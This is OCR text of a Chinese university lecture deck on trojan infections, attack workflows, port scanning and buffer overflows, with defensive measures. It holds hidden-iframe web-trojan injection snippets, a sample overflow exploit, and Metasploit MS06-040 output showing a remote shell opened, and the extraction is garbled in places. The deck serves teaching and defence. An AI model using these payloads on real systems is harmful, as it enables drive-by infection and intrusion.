黑客攻擊引起的網絡安全異常

狀態診斷

崔寶江副教授博導

北京郵電大學計算機學院

cui_bj@

北郵?信息安全中心?崔寶江

目錄

主機被木馬遠程控制的現象

二.黑客攻擊基本流程

三.黑客常見攻擊方法和防范措施

四.結束語

北郵?信息安全中心?崔寶江

主機被木馬遠程控制的現象

I

□現象1：QQ、MSN的異常登錄提醒，你在登錄

QQ時，系統提示上一次的登錄IP利你完全不

相干。比如，你明明就只在上海的家里上過，

QQ卻提醒你上一次登錄地點在沈陽。

□現象2：網絡游戲登錄時發現裝備丟失或和你

上次下線時的位置不符，甚至用正確的密碼無

法登錄。

□現象3：有時會突然發現你的鼠標不聽使喚，

在你不動鼠標的時候，鼠標也會移動，并且還

會點擊有關按鈕進行操作。

北郵?信息安全中心?崔寶江

主機被木馬遠程控制的現象

口現象4：正常上網時，突然感覺很慢，硬盤燈

在閃爍，就象你平時在COPY文件。

□現象5：當你準備使用攝像頭時，系統提示，

該設備正在使用中。

口現象6：在你沒有使用網絡資源時，你發現網

卡燈在不停閃爍。如果你設定為連接后顯示狀

態，你還會發現屏幕右下角的網卡圖標在閃。

北郵?信息安全中心?崔寶江

木馬概述

1特洛伊木馬程序可以直接侵入用戶的電腦并進

行破壞，它常被偽裝成工具程序或者游戲等誘使用

戶打開帶有木馬程序的郵件附件或從網上直接下載

,一旦用戶打開了這些郵件的附件或者執行了這些

程序之后，它們就會在計算機系統中隱藏一個可以

在啟動時悄悄執行的程序。這種遠程控制工具可以

完全控制受害主機，危害極大。

WindowsT：

Netbus>subseven、BO、冰河、網絡神偷等

UNIX下：

Rhost++>Login后|】、rootkit等北郵?信息安全中心?代

木馬組成

L對木馬程序而言，它一般包括兩個部分：客戶端和服務器

上山

“而。

?服務器端安裝在被控制的計算機中，它一般通過電子郵件

或其他手段讓用戶在其計算機中運行，以達到控制該用戶

計算機的目的。

?客戶端程序是控制者所使用的，用于對受控的計算機進行

控制。服務器端程序和客戶端程序建立起連接就可以實現

對遠程計算機的控制了。

?木馬運行時，首先服務器端程序獲得本地計算機的最高操

作權限，當本地計算機連入網絡后，客戶端程序可以與服

務器端程序直接建立起連接，并可以向服務器端程序發送

各種基本的操作請求，并由服務器端程序完成這些請求，

也就實現對本地計算機的控制了。北郵.信息安全中心.崔寶江為

?木馬本身不具備繁殖性和自動感染的功能?！?/p>

q木馬分類

?遠程訪問型木馬是現在最廣泛的特洛伊木馬，它可以訪問受害人的硬

盤，并對其進行控制。這種木馬用起來非常簡單，只要某用戶運行一下服

務端程序，并獲取該用戶的IP地址，就可以訪問該用戶的計算機。這種木

馬可以使遠程控制者在本地機器上做任意的事情，比如鍵盤記錄、上傳和

下載功能、截取屏幕等等。這種類型的木馬有著名的BO(BackOffice)

和國產的冰河等。

?密碼發送型木馬的目的是找到所有的隱藏密碼，并且在受害者不知道的

情況下把它們發送到指定的信箱。大多數這類的木馬不會在每次的

Windows重啟時重啟，而且它們大多數使用25端口發送E-mail。

?鍵盤記錄型木馬非常簡單的，它們只做一種事情，就是記錄受害者的鍵

盤敲擊，并且在LOG文件里做完整的記錄。這種特洛伊木馬隨著

Windows的啟動而啟動，知道受害者在線并且記錄每一件事。

?毀壞型木馬的唯一功能是毀壞并且刪除文件。這使它們非常簡單，并且

很容易被使用。它們可以自動地刪除用戶計算機上的所有的.DLL、INI或

EXE文件。

?FTP型木馬打開用戶計算機的21端口(FTP所使用的默認端口)，像等

一個人都可以用一個FTP客戶端程序來不用密朝建則談評算機承前減

可以進行最高權限的上傳下載。

木馬分類

f二代木馬

□冰河、廣外女生

?第三代木馬

口灰鴿子

。反彈端口技術

?第四代木馬

□廣外幽靈、廣外男生

。線程插入

?第五代木馬

口進程、端口、文件、注冊表隱藏

北郵?信息安全中心?崔寶江

第3代木馬一反彈端口木馬1

連接請求

攻擊者http

ClientServer

黑客用戶

北郵?信息安全中心?崔寶江

Web/ftp服務器北郵?信息安全中心?崔寶江

第4代木馬一線程插入

?系統/應用程序gwboy.dll

昌Vindovs任務管理器

文件3）選項查看9幫助QP

聯網

用

映像名稱戶名

jfxc.had.exe

TINTSETP.EXE36oog

msinfo32exe3924

msinn.exe3968oo12,

TPHKMGR.exe3892oo2,

37oo

Foxn&il.ex?923,，

TpScrex.exe3476oo叩

retlsched.?x?3420

explorer.exe34360133,

agentsvrexe3392005,

32

WINWORD.EXE56005,

32

SysSafe.exe36005,

31笫002,1

taslongr.exe4000

ctfmon.este56

29006,

coniine.exe284400

PGPtray.exe280000

igfxtray.exe

□顯示所有用戶的進程堪）|結束進程豆）〕

進程數：53CPU使用：律提交更改：45毓/1857M

共山"信息安全中心.崔寶江

第5代木馬一進程隱藏

北郵?信息安全中心?崔寶江

第5代木馬一無端口木馬

臨時端口7000

服務端

木馬會選擇一些常用的端口，如80、23,有些非常先進的木馬還可

以做到在占領HTTP(80)端口后，收到正常的HTTP請求仍然把它交

與Web服務器處理，只有收到一些特殊約定的數據包后，才調用木

馬程序。

北郵?信息安全中心?崔寶江

木馬演示

?木馬演示

北郵?信息安全中心?崔寶江

TCP/IP協議簇

TCP三次握手機制

主機A：客戶端主機B：服務端

o自

發送TCPSYN分段

1)(seq=100ctl=SYN)

SYNreceived

發送TCPSYN&ACK分段

SYNreceived(seq=300ack=101ctl=syn,ack)

Established

少(seq=101ack=301ctl=ack：

北郵?信息安全中心?崔寶江

32bit

816

IIIIIIIIIII

源端口目的端口

序號

20字節的

TCP確認號固定首部

首部FWAP

保留CS窗口

偏移H

檢驗和緊急指針

選項（長度可變）填充

TCP報文段TCP首部TCP數據部分

發送在前1

IP首部IP數據部分V

北郵?信息安全中心?崔寶江

TCP/IP相關問題

一個TCP頭包含6個標志位。它們的意義如下所

述：

SYN:標志位用來建立連接，讓連接雙方同步序列號。如果SYN=1而ACK=O,則表示該

數據包為連接請求，如果SYN=1而ACK=1則表示接受連接；

FIN:表示發送端已經沒有數據要求傳輸了，希望釋放連接；

RST:用來復位一個連接。RST標志置位的數據包稱為復位包。一般情況下，如果TCP收

到的一個分段明顯不是屬于該主機上的任何一個連接，則向遠端發送一個復位包；

URG:為緊急數據標志。如果它為1,表示本數據包中包含緊急數據。此時緊急數據指針

有效；

ACK:為確認標志位。如果為1,表示包中的確認號時有效的。否則，包中的確認號無

效；

P骷％相攙%，聾爵趣跋嘏駛絨”懶碑。北郵.信息安全中心,崔寶江⑤)

端口掃描基礎

:匕叫'?侶是女生甲心至玉江飛

TCP三次握手機制

主機A：客戶端主機B：服務端

o自

發送TCPSYN分段

1)(seq=100ctl=SYN)

SYNreceived

發送TCPSYN&ACK分段

SYNreceived(seq=300ack=101ctl=syn,ack)

Established

少(seq=101ack=301ctl=ack：

北郵?信息安全中心?崔寶江

問題

?黑客如何入侵？

?我們如何能夠檢測出來?

北郵?信息安全中心?崔寶江

目錄

—.主機被控的現象

黑客攻擊基本流程

三.黑客常見攻擊方法和防范措施

四.結束語

北郵?信息安全中心?崔寶江

二.黑客攻擊基本流程

二黑客攻擊基本流程

口誘騙式攻擊

口主動定點攻擊

北郵?信息安全中心?崔寶江

二.黑客攻擊基本流程

』-

?二.黑客攻擊基本流程

口誘騙式攻擊

。誘騙打開網站或者點擊網站鏈接

。誘騙從網站下載文件

。誘騙打開電子郵件附件或者頁面中的隱藏鏈接

。誘騙打開QQ、MSN發來的文件或者鏈接

。通過網絡或者U盤等介質感染病毒

網

北郵?信息安全中心?崔寶江

二.黑客攻擊基本流程

?網頁掛馬

口在網頁代碼中加入隱蔽的框架

?？蚣艿拇a如下：

O<iframesrc=地址width=Oheight=Ox/iframe>

。其中“地址”就是木馬所在的遠程地址，"width=O

height=O”意味著該框架為不可視的，用戶就很難

發現木馬的運行。

北郵?信息安全中心?崔寶江

二.黑客攻擊基本流程

?網頁掛馬

□通過Html文件的body標記進行掛馬

Otop.document.body.innerHTML=

top.document.body.innerHTML+V\n<iframe

src=地址width=,0,height=,O,x/iframe>,;

北郵?信息安全中心?崔寶江

二.黑客攻擊基本流程

?網頁掛馬

□偽裝掛馬：在某些特定的位置嵌入木馬的運

行代碼

O圖片偽裝：在圖片打開之前，執行了一個寫有木

馬地址的框架。

<html>

<iframesrc="網馬地址"height=Owidth=0x/iframe>

<imgsrc="圖片地址”>v/center>

</html>

北郵?信息安全中心?崔寶江

二,黑客攻擊基本流程

?捆綁式欺騙

口將木馬利目標文件進行捆綁后形成一個具有迷

惑性的文件

北郵?信息安全中心?崔寶江

二.黑客攻擊基本流程

二黑客攻擊基本流程

口誘騙式攻擊

口主動定點攻擊

北郵?信息安全中心?崔寶江

主動定點攻擊步驟

預攻擊探測

t收集信息，如OS類型,提供的服務端口

發現漏洞,采取攻擊行為

t破解口令文件，或利用緩存溢出漏洞

獲得攻擊目標的控制權系統

t獲得系統帳號權限，并提升為root權限

安裝系統后門

t方便以后使用

繼續滲透網絡，直至獲取機密數據

t以此主機為跳板，尋找其它主機的漏洞

消滅蹤跡北郵?信息安全中心?崔寶江

消除所有入侵腳印，以免我譽理負蓑覺J

目錄

—.主機被控的現象

二.黑客攻擊基本流程

三.黑客常見攻擊方法和防范措施

四.結束語

北郵?信息安全中心?崔寶江

三.黑客常見攻擊方法和防范措施

1.網絡與主機的漏洞掃描和攻擊

2.緩沖區溢出攻擊

3.SQL注入攻擊

4.口令破解和嗅探

5.拒絕服務攻擊

6.ARP欺騙

北郵?信息安全中心?崔寶江

端口掃描基礎

?掃描原理

□1）全TCP連接

□2）SYN掃描（半打開式掃描）

O發送SYN,遠端端口開放,則回應SYN=1,ACK=1，本地發送RST給遠端,

拒絕連接

。發送SYN,遠端端口未開放，回應RST

□3）FIN掃描（秘密掃描）

。本地發送FIN=1,遠端端口開放，丟棄此包，不回應

。本地發送FIN=1,遠端端口未開放，返回一個RST包

北郵?信息安全中心?崔寶江

TCP三次握手機制

主機A：客戶端主機B：服務端

o自

發送TCPSYN分段

1)(seq=100ctl=SYN)

SYNreceived

發送TCPSYN&ACK分段

SYNreceived(seq=300ack=101ctl=syn,ack)

Established

少(seq=101ack=301ctl=ack：

北郵?信息安全中心?崔寶江

全TCP連接

”期以來TCP端口掃描的基礎

□掃描主機嘗試（使用三次握手）與目的機指定端口建

立建立正規的連接

?連接由系統調用connect。開始

口對于每一個監聽端口，connect。會獲得成功，否則返

回一1,表示端口不可訪問

?很容易被檢測出來

□Courtney,Gabriel和TCPWrapper監測程序通常用來進

行監測。另外，TCPWrapper可以對連接請求進行控

制，所以它可以用來阻止來自不明主機的全連接掃描

北郵?信息安全中心?崔寶江

TCPSYN掃描

北郵?信息安全中心?崔寶江

]/r~

TCPFIN掃描

北郵?信息安全中心?崔寶江

端口掃描基礎

?利用TCP/IP來識別不同的操作系統和服務

?向系統發送各種特殊的包，根據系統對包

回應的差別，推斷出操作系統的種類

?端口掃描程序利用的部分特征

口ICMP錯誤信息抑制

口服務類型值(TOS)

口TCP/IP選項

□對SYNFLOOD的抵抗力

口TCP初始窗口

北郵?信息安全中心?崔寶江

高級掃描技術-慢速掃描

A如果掃描是對非連續性端口、源地址不一致、時

間間隔很長且沒有規律的掃描的話，這些掃描的

記錄就會淹沒在其他眾多雜亂的日志內容中

＞使用慢速掃描的目的就是騙過防火墻和入侵檢測

系統而收集信息。雖然掃描所用的時間較長，但

是這是一種較難發現的掃描

北郵?信息安全中心?崔寶江

高級掃描技術-亂序掃描

A普通的掃描器在掃描遠程系統的端口時，對端口

掃描的順序是有序的，這種按照一定的順序掃描

端口的方式很容易被入侵檢測系統發覺。

A亂序掃描的端口號的順序是隨機生產的，這種方

式能有效的欺騙某些入侵檢測系統而不會被入侵

檢測系統發覺

[■端口掃描工具（Windows平臺）

工

>SuperScan

>Nmap

網

北郵?信息安全中心?崔寶江

端口掃描工具：SuperScan

。SuperScan3.00

Jd

IPTimeoutScantypeScan

pinging

Stag01Q10.155-2JPingrResolvehostnames

|400Onlyscanresponsiveping$00

Stop|00

ShowhoslresponsesScannim

PrevC|Nextc|1..254|Connect：發Pingonly10.10,10155

[2000~

rEveryportinlistResolving

“IgnoreIPzeroAllselectedportsinlist

Read

BIgnoreIP255Alllistportsfrom655#：

|400(f

FExtractfromfile「「

AllportsfromI46S535

Speed

Maxay55Activehosts

B?21FileTransferProtocol[Control]

E*3220IsMicrosoftFTPService(Version50)…500"：commandnotunderstcOpenports

日?25SimpleMailTransfer3

畫

220IsMicrosoftESMTPMAILService,Version:5.0.2172.1readyatTueSave

日?「而WohdWideWei用背隹

&HTTM.i302Objectmoved.Server:Microwft-IISZ5.0..Date:Tue,22JJCollapseall

Expandall

±]Prune

端口掃描工具：NmapNT

北郵?信息安全中心?崔寶江

針對預攻擊探測的防范措施

?Pingsweep

安裝防火墻或相關工具軟件，禁止某些ICMPping,使用

NAT隱臧內部網絡結構

Portscan

安裝防火墻或相關工具軟件，禁止訪問不該訪問的服務端口

OSfingerprint

安裝防火墻或相關工具軟件，只允許訪問少量服務端口，由

于攻擊者缺乏必要的信息，無法判斷OS類型

資源和用戶掃描

防范NetBIOS掃描的最直接方法就是不允許對TCP/UDP135

到139端口的訪問，如通過防火墻或路由器的配置等。另外，

對單獨的主機，可使用NetBIOSoverTCP/IP項失效或注冊表

配置來實現。

北郵?信息安全中心?崔寶江

漏洞掃描和攻擊概述

漏洞掃描是一種最常見的攻擊模式

,用于探測系統和網絡漏洞，如獲取系

統和應用口令，嗅探敏感信息，利用緩

存區溢出直接攻擊等。

針對某一類型的漏洞，都有專門的

攻擊工具。另外，也有一些功能強大綜

合掃描工具，針對系統進行全面探測和

漏洞掃描，如流光等。

北郵?信息安全中心?崔寶江g

I綜合掃描

I安全掃描審計;

口分類

。網絡安全掃描

。系統安全掃描

口優點

。較全面檢測流行漏洞

。降低安全審計人員的勞動強度

。防止最嚴重的安全問題

口缺點

。無法跟上安全技術的發展速度

。只能提供報告，無法實際解決

O可能出現漏報和誤報

北郵?信息安全中心?崔寶江

漏洞利用周期圖表

入侵者采用公自動掃描安全

布的攻擊代碼漏洞工具發布

簡陋的漏洞

自動掃描安全漏入侵者著眼

攻擊代碼發布洞工具廣泛流傳

新的漏洞

資深黑客

發現漏洞

3

北郵?信息安全中心?崔寶江

綜合掃描器的使用

漏洞描述與解決方法

■皿可耽仝絹a知瑞

所。的，“甫做出可以以典?色趣?小，

雙擊*amt囑SMBH力9蛆只名被即從再Hfl入U尿“%

RSASNSF0CV8?觸保期奸！MfcUMfBLl電：

?般共*，都期:

麻力室

,確火埴上seM睢制a共N務的訪利：

?嫌■足幅愉口敘

北郵?信息安全中心?崔寶江

哪些方面對系統進行安全評估

為堵死安全策略和安全措施之間的缺口,必須從

以下三方面對網絡安全狀況進行評估：

從企業外部進行評估:考察企業計算機基礎設

施中的防火墻;

從企業內部進行評估:考察內部網絡系統中的

計算機;

從應用系統進行評估:考察每臺硬件設備上運

行的操作系統。

北郵?信息安全中心?崔寶江

綜合掃描和攻擊工具演示

?流光

?X-Scan

?SSS

?Nessus

北郵?信息安全中心?崔寶江

漏洞攻擊的防范措施

?安裝防火墻，禁止訪問不該訪問的服務端口，使用

NAT隱藏內部網絡結構

?安裝入侵檢測系統，檢測漏洞攻擊行為

?安裝安全評估系統，先于入侵者進行模擬漏洞攻擊,

以便及早發現漏洞并解決

?提高安全意識，經常給操作系統和應用軟件打補丁

北郵?信息安全中心?崔寶江

三.黑客常見攻擊方法和防范措施

1.網絡與主機的漏洞掃描和攻擊

2,緩沖區溢出攻擊

3.SQL注入攻擊

4.口令破解和嗅探

5.拒絕服務攻擊

6.ARP欺騙

北郵?信息安全中心?崔寶江

緩沖區溢出攻擊

十年來最大的安全問題

這是一種系統攻擊手段，通過向程序的緩沖區

寫超出其長度的內容，造成緩沖區的溢出，從而

破壞程序的堆棧，使程序轉而執行其它指令，以

達到攻擊的目的。這種攻擊可以使得一個匿名的

Internet用戶有機會獲得一臺主機的部分或全部

的控制權。

北郵?信息安全中心?崔寶江

緩沖區溢出基本原理

受攻擊程序vulnerable.c

voidmain(intargc,char^argv[])

charbuff[1024];

if(argc>1)

strcpy(buff,argv[l]);

北郵?信息安全中心?崔寶江

緩沖區溢出基本原理

攻擊程序exploit,c

#include<stdio.h>

#include<unistd.h>

voidmain(){

charstring[2000];

for(i=0;i<2000;i++)string[i]='A';

execl(''./vulnerable“Jvulnerable''string,0);

北郵?信息安全中心?崔寶江

緩沖區溢出基本原理

Vulnerable.cmain（）函數的堆棧情況

buff和]（棧頂）buff^[AAAA]（棧頂）

[……]

[AAAA]

[其他寄存器值][AAAA]

[ebp][AAAA]^ebp

[ret][AAAA]-ret

北郵?信息安全中心?崔寶江

AvailableExploits(8)Baa

SEARCH06_040

Matched1modulesforterm06040

MicrosoftServerServiceNetpwPathCanonicalizeOverflow

ThismoduleexploitsastackoverflowintheNetApi32CanonicalizePathName()functionusingthe

NetpwPathCanonicalizeRPCcallintheServerServiceItislikelythatotherRPCcallscouldbeusedto

exploitthisservice.ThisexploitwillresultinadenialofserviceononWindowsXPSP2orWindows

2003SP1.AfailedexploitattemptwilllikelyresultinacompleterebootonWindows2000andthe

terminationofallSfvIB-relatedservicesonWindowsXPThedefaulttargetforthisexploitshould

succeedonWindowsNT4.0.Windows2000SP0-SP4*WindowsXPSP0-SP1andWindows2003

SP0.

完成&<

OMetasplatFrame...里坤?10:27

Rit￥7而翼i胃、y笳i|函工儂fjj

文件㈤端輯（f）查看歷史⑸書簽回TM（I）朝助?。?/p>

■http:〃:55555/GO@tGoogle

■新手上路?最新頭條

?Disable?JkCookies*■CSS*■Forms*■Images*SInformation*?Msceianeous?Outfine*JJResize*Tools*OViewSource*Options*

嗓ExploitsAuxilianes?Payloads.ConsoleSessions妙About

MicrosoftServerServiceNetpwPathCanonicalizeOverflow(10)EJBE3

ThismoduleexploitsastackoverflowintheNetApi32CanonicalizePathName()functionusingthe

NetpwPathCanonicalizeRPCcallintheServerServiceItislikelythatotherRPCcallscouldbe

usedtoexploitthisserviceThisexploitwillresultinadenialofserviceononWindowsXPSP2or

Windows2003SP1AfailedexploitattemptwilllikelyresultinacompleterebootonWindows2000

andtheterminationofallSMB-relatedservicesonWindowsXPThedefaulttargetforthisexploit

shouldsucceedonWindowsNT40Windows2000SP0-SP4+WindowsXPSP0-SP1and

Windows2003SP0.

Thismodule(v4532)wasprovidedbyhdmundertheMetasploitFrameworkLicense

Selectatargettocontinue:

o(wcscpy)Automatic(NT4.0,2000SP0-SP4.XPSP0-SP1)

o(wcscpy)WindowsNT4.0IWindows2000SP0SP4

o(wcscpy)WindowsXPSP0/SP1

0(stack)WindowsXPSP1English

o(stack)WindowsXPSP1Italian

o(wcscpq)Windows2003SP0

戚若陽|*擊4aO■MetasplatFrame...里坤?10:27

Rit￥7而翼i胃、y笳i|函工儂fjj

文件㈤端輯（f）查看歷史⑸書簽回TM（I）朝助?。?/p>

■http:〃:55555/GO@tGoogle

■新手上路?最新頭條

?Disable?JkCookies*■CSS*■Forms*■Images*SInformation*?Msceianeous?Outfine*JJResize*Tools*OViewSource*Options*

嗓ExploitsAuxilianes?Payloads.ConsoleSessions妙About

OMetasplatFrame...里坤?10:27

或幅附泡w彷門”?了:因】，箋依■野酎,南仔啟口荏戶

nmraaYd11Au

文件（￡）編梅3登看（？）歷史⑸書簽坦）TM（T）幫助出）???

■▼二'QC.'http:〃:55555/C3OBLGoogle

■新手上路照最新頭條

0Disable*ACookies*■CSS*■Forms*HImages*SInformation*?Miscdteneou5y/Outfne~J*Resize*Toot*flViewSource*Options*

IEIHQ

WelcometotheMetasploitWebConsole!

)/1/一)\lI

III((//Il_((II_IIIIII

./III-/

=[msfv3.0

+——=[176exploits-104payloads

+——=L17encoders-bnops

=[30aux

Startedreversehandler

DetectedaWindows2000target

Bindingto4b324fc8-1670-01d3-1278-5a47bf6eel88:3.0@ncacn_np:01[\BROWSER]

Boundto4b324fc8-1670-01d3-1278-5a47bf6eel88:3.0@ncacn_np:01[\BROWSER]...

Buildingthestubdata...

Callingthevulnerablefunction...

Commandshellsession1opened(10:4444->01:1061)

MicrosoftWindows2000[Version5.00.2195]

(C)Copyright1985-2000MicrosoftCorp.

C:\WINNT\system32>

(running)

III

完成&

矽MetasploitFramewor...一國3

A出高i￥閨/席值的7K；］iVJEillHl-①

文件（E）編物但查看區）歷史⑸書簽回工具①稽助電）址

4.“?C.■http:〃:55555/(30BLGoogle

新手上路?最新頭條

?Disable~4^Cookies*■CSS*■Forms*■Images**Information**Miscellaneous*XOutline*J*Resee*/Tools'-ViewSource*Options*

MetasoloitExploit(11)QHQ

1469File(s)198,627,441bytes

28Dir(s)3,218,411,520bytesfree

C:\WINNT\system32>

?dirc:\/a

dirc:\/a

VolumeindriveChasnolabel.

VolumeSerialNumberis0081-F487

Directoryofc:\

08/27/200710:01p27123.txt

06/19/200306:05p150,528arcldr.exe

06/19/200306:05p163,840arcsetup.exe

08/15/200709:59p0AUTOEXEC.BAT

08/15/200709:53p192boot.ini

08/15/200709:59p0CONFIG.SYS

09/01/200704:26a<DIR>DocumentsandSettings

08/15/200709:59p0IO.SYS

08/15/2007